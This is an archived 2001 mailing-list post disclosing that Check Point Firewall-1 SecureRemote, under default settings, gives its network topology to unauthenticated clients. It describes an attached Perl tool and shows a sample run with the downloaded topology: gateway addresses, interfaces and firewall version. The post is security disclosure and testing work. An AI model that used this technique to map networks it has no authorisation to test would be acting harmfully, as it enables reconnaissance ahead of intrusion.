Hi. Checkpoint Firewall-1 makes use of a piece of software called SecureRemote to create encrypted sessions between users and FW-1 modules. Before remote users are able to communicate with internal hosts, a network topology of the protected network is downloaded to the client. While newer versions of the FW-1 software have the ability to restrict these downloads to only authenticated sessions, the default setting allows unauthenticated requests to be honoured. This gives a potential attacker a wealth of information including ip addresses, network masks (and even friendly descriptions) The attached file will connect to the firewall, and download the toplogy (if SecureRemote is running) (it is a tiny perl file, which needs only Socket, so avoids the hassle of having to install the SecureRemote client <or booting windows> to test a firewall-1) --snip-- SensePost# perl sr.pl firewall.victim.com Testing on port 256 :val ( :reply ( : (-SensePost-dotcom-.hal9000-19.3.167.186 :type (gateway) :is_fwz (true) :is_isakmp (true) :certificates () :uencapport (2746) :fwver (4.1) :ipaddr (19.3.167.186) :ipmask (255.255.255.255) :resolve_multiple_interfaces () :ifaddrs ( : (16.3.167.186) : (12.20.240.1) : (16.3.170.1) : (29.203.37.97) ) :firewall (installed) :location (external) :keyloc (remote) :userc_crypt_ver (1) :keymanager ( :type (refobj) :refname ("#_-SensePost-dotcom-") ) :name (-SensePost-dotcom-Neo16.3.167.189) :type (gateway) :ipaddr (172.29.0.1) :ipmask (255.255.255.255) ) --snip-- Haroon Meer +27 837866637 haroonat_private http://www.sensepost.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 23:28:41 PDT